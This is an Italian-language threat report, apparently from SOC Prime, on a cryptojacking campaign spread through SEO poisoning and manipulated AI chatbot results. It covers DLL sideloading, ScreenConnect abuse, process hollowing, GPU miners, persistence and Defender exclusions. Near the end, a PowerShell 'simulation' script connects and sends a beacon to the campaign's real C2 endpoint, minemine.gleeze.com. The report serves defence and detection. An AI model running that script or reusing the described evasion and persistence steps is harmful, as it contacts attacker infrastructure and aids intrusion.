Dai Risultati di Ricerca Avvelenati al Mining GPU: Una Campagna di Cryptojacking Utilizzando ScreenConnect e Utility .NET

SOC Prime Team

Segui

Dai Risultati di Ricerca Avvelenati al Mining GPU: Una Campagna di Cryptojacking Utilizzando ScreenConnect e Utility .NET

Detection stack

AIDR
Alert
ETL
Query

Rapporto
Flusso di Attacco
Rilevamenti
Simulazioni

Riassunto

Questa campagna utilizza l’avvelenamento SEO e i risultati di ricerca manipolati dei chatbot AI per attirare gli utenti a scaricare falsi strumenti di monitoraggio hardware. Gli installatori trojanizzati contengono una DLL malevola che viene caricata come sideload su un’applicazione legittima e distribuisce in modo silenzioso ScreenConnect. Gli attaccanti utilizzano quindi ScreenConnect per avviare un dropper RunPE personalizzato che scava i binari .NET firmati da Microsoft e inietta il payload della fase successiva. La fase finale scarica strumenti di mining GPU come gminer, lolMiner, e SRBMiner-MULTI, poi mantiene la persistenza tramite attività programmate, chiavi di Run del registro e un collegamento di avvio. Il malware aggiunge anche esclusioni di Windows Defender per ridurre la possibilità di rilevamento.

Investigazione

I ricercatori di Microsoft Defender hanno mappato l’intera catena di infezione, incluso il metodo di sideloading della DLL, l’abuso di ScreenConnect come strumento di gestione remota e l’uso di un loader RunPE personalizzato chiamato SimpleRunPE.exe. Gli analisti hanno recuperato gli argomenti della riga di comando di ScreenConnect, identificato l’elenco dei binari .NET firmati utilizzati per il processo di hollowing, e documentato un endpoint di comando e controllo protetto con un certificato TLS pinnato. L’indagine ha anche rivelato infrastrutture di supporto come domini malevoli, indirizzi IP, e dettagli del provider DNS collegati alla campagna.

Mitigazione

I difensori dovrebbero abilitare la protezione fornita dal cloud, applicare regole di riduzione della superficie d’attacco, bloccare i file eseguibili che non soddisfano requisiti di reputazione, prevalenza o età, e attivare la protezione web e di rete in Microsoft Defender per Endpoint. Gli strumenti di gestione remota come ScreenConnect dovrebbero essere disabilitati dove non necessari o strettamente controllati dove richiesto, con monitoraggio delle attività pianificate non autorizzate e voci di registro Run sospette. Tutte le esclusioni di Windows Defender aggiunte dal malware dovrebbero essere rimosse immediatamente, e i domini e gli indirizzi IP malevoli identificati bloccati.

Risposta

If RuntimeHost.exe or SimpleRunPE.exe viene trovato in esecuzione da directory di cache nascoste, isolare immediatamente l’host interessato, terminare la sessione di ScreenConnect correlata, e rimuovere tutti i meccanismi di persistenza, comprese attività pianificate, chiavi Run e collegamenti di avvio. Bloccare il dominio minemine.gleeze.com e gli indirizzi IP osservati, quindi cercare nell’ambiente i binari di miner elencati e autorun.dll. Infine, ripristinare le protezioni di Defender e rivedere le impostazioni di esclusione per eventuali modifiche non autorizzate.

graph TB %% Definizioni delle classi classDef action fill:#99ccff classDef technique fill:#ffdd99 classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ffcc66 classDef persistence fill:#99ff99 classDef defense fill:#ff66cc classDef privilege fill:#ffb366 classDef c2 fill:#66ccff classDef discovery fill:#c2c2f0 %% Nodi action_initial_access[“Azione – T1659 Content Injection SEO poisoning e link di chatbot IA distribuiscono file ZIP malevoli mascherati da utility.”] class action_initial_access action technique_event_trigger[“Tecnica – T1546.009 AppCert DLL autorun.dll posizionata accanto a un’utility legittima viene caricata quando l’utility viene eseguita.”] class technique_event_trigger technique process_msiexec[“Processo – msiexec.exe”] class process_msiexec process technique_dll_injection[“Tecnica – T1055.001 Dynamic-link Library Injection autorun.dll richiama msiexec per installare silenziosamente vcredist_x64.dll malevolo contenente l’installer di ScreenConnect.”] class technique_dll_injection technique technique_proxy_execution[“Tecnica – T1218.007 Msiexec Proxy Execution msiexec esegue l’installer malevolo e stabilisce un client ScreenConnect.”] class technique_proxy_execution technique malware_screenconnect[“Malware – Client ScreenConnect”] class malware_screenconnect malware persistence_scheduled[“Persistenza – T1543 Scheduled Tasks Task denominati “Windows System Health”, ecc., rilanciano il malware.”] class persistence_scheduled persistence persistence_registry[“Persistenza – T1037.001 Script di logon Vengono aggiunte chiavi Registry Run (HKLM/HKCU\\Run\\WinSysCache).”] class persistence_registry persistence persistence_startup[“Persistenza – T1037.004 RC Script Un collegamento nella cartella Startup punta a RuntimeHost.exe.”] class persistence_startup persistence defense_exclusions[“Elusione delle difese – T1564.012 Esclusioni file/percorso & T1564.010 Spoofing degli argomenti di processo Aggiunge esclusioni di Windows Defender per file e processi.”] class defense_exclusions defense defense_impair[“Elusione delle difese – T1562 Compromissione delle difese Utilizza le esclusioni per aggirare il rilevamento AV.”] class defense_impair defense defense_sandbox[“Elusione delle difese – T1497 Evasione di virtualizzazione/sandbox Controlli di attività utente (T1497.002) ed evasione basata sul tempo (T1497.003) interrompono l’esecuzione negli ambienti di analisi.”] class defense_sandbox defense defense_codesign[“Elusione delle difese – T1553.002 Sovvertire i controlli di fiducia Codice malevolo viene eseguito all’interno di binari .NET firmati Microsoft tramite process hollowing.”] class defense_codesign defense privilege_hollowing[“Escalation dei privilegi – T1055.012 Process Hollowing SimpleRunPE avvia un binario .NET legittimo in stato sospeso e inietta il payload.”] class privilege_hollowing privilege c2_websocket[“Command and Control – T1102.002 Websocket Connessione cifrata wss://minemine.gleeze.com:8443/ws con TLS pinning.”] class c2_websocket c2 discovery_info[“Discovery – T1082 Informazioni di sistema, T1592.001 Hardware, T1592.002 Software Raccoglie CPU, GPU, RAM, versione del sistema operativo, prodotto di sicurezza, ecc., per valutare la fattibilità del mining.”] class discovery_info discovery %% Flusso action_initial_access –>|porta a| technique_event_trigger technique_event_trigger –>|carica| process_msiexec process_msiexec –>|esegue| technique_dll_injection technique_dll_injection –>|installa| technique_proxy_execution technique_proxy_execution –>|installa| malware_screenconnect malware_screenconnect –>|crea| persistence_scheduled malware_screenconnect –>|crea| persistence_registry malware_screenconnect –>|crea| persistence_startup malware_screenconnect –>|aggiunge| defense_exclusions defense_exclusions –>|abilita| defense_impair defense_impair –>|facilita| defense_sandbox defense_sandbox –>|supportato da| defense_codesign defense_codesign –>|abilita| privilege_hollowing privilege_hollowing –>|stabilisce| c2_websocket c2_websocket –>|riceve| discovery_info

Flusso di Attacco

Narrazione & Comandi di Attacco:
Un attaccante ha già consegnato un binario legittimo scavato sulla macchina vittima. Il binario ora inizia un canale persistente C2 su un WebSocket connessione a wss://minemine.gleeze.com:8443/ws. Per emulare questo, usiamo uno script PowerShell che crea un .NET ClientWebSocket, opzionalmente imposta un callback personalizzato di validazione del certificato TLS (simulando il pinning del certificato), e mantiene la connessione per un breve periodo.

Script di Test di Regressione:

# Simula una comunicazione C2 da un binario scavato
# Requisiti: PowerShell 5+ (classi .NET integrate)
$c2Url = 'wss://minemine.gleeze.com:8443/ws'

# Crea client WebSocket
$ws = [System.Net.WebSockets.ClientWebSocket]::new()

# OPZIONALE: Forza il pinning del certificato (accetta solo un'impronta digitale specifica)
$allowedThumbprint = 'ABCD1234EF567890ABCD1234EF567890ABCD1234'  # segnaposto
$handler = [System.Net.Http.HttpClientHandler]::new()
$handler.ServerCertificateCustomValidationCallback = {
    param($sender, $cert, $chain, $sslPolicyErrors)
    $cert.Thumbprint -eq $allowedThumbprint
}

try {
    Write-Host "Connessione all'endpoint C2 $c2Url ..."
    $ws.ConnectAsync([System.Uri]::new($c2Url), [System.Threading.CancellationToken]::None).Wait()
    Write-Host "Connessione stabilita. Inviando payload di beacon..."

    # Invia un beacon dummy (JSON)
    $payload = '{ "beat": "alive", "ts": "' + (Get-Date).ToString('o') + '" }'
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $segment = [System.ArraySegment[byte]]::new($bytes)
    $ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()

    Start-Sleep -Seconds 10   # Mantiene il canale aperto per una breve finestra
}
finally {
    Write-Host "Chiusura WebSocket..."
    $ws.Abort()
}

Comandi di Pulizia:

# Assicurarsi che qualsiasi processo WebSocket residuo sia terminato
Get-Process -Name powershell | Where-Object { $_.MainWindowTitle -match 'WebSocket' } | Stop-Process -Force
# Opzionalmente rimuovere i file temporanei utilizzati nel test
Remove-Item -Path "$env:TEMP*C2Simulation*" -Force -ErrorAction SilentlyContinue

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis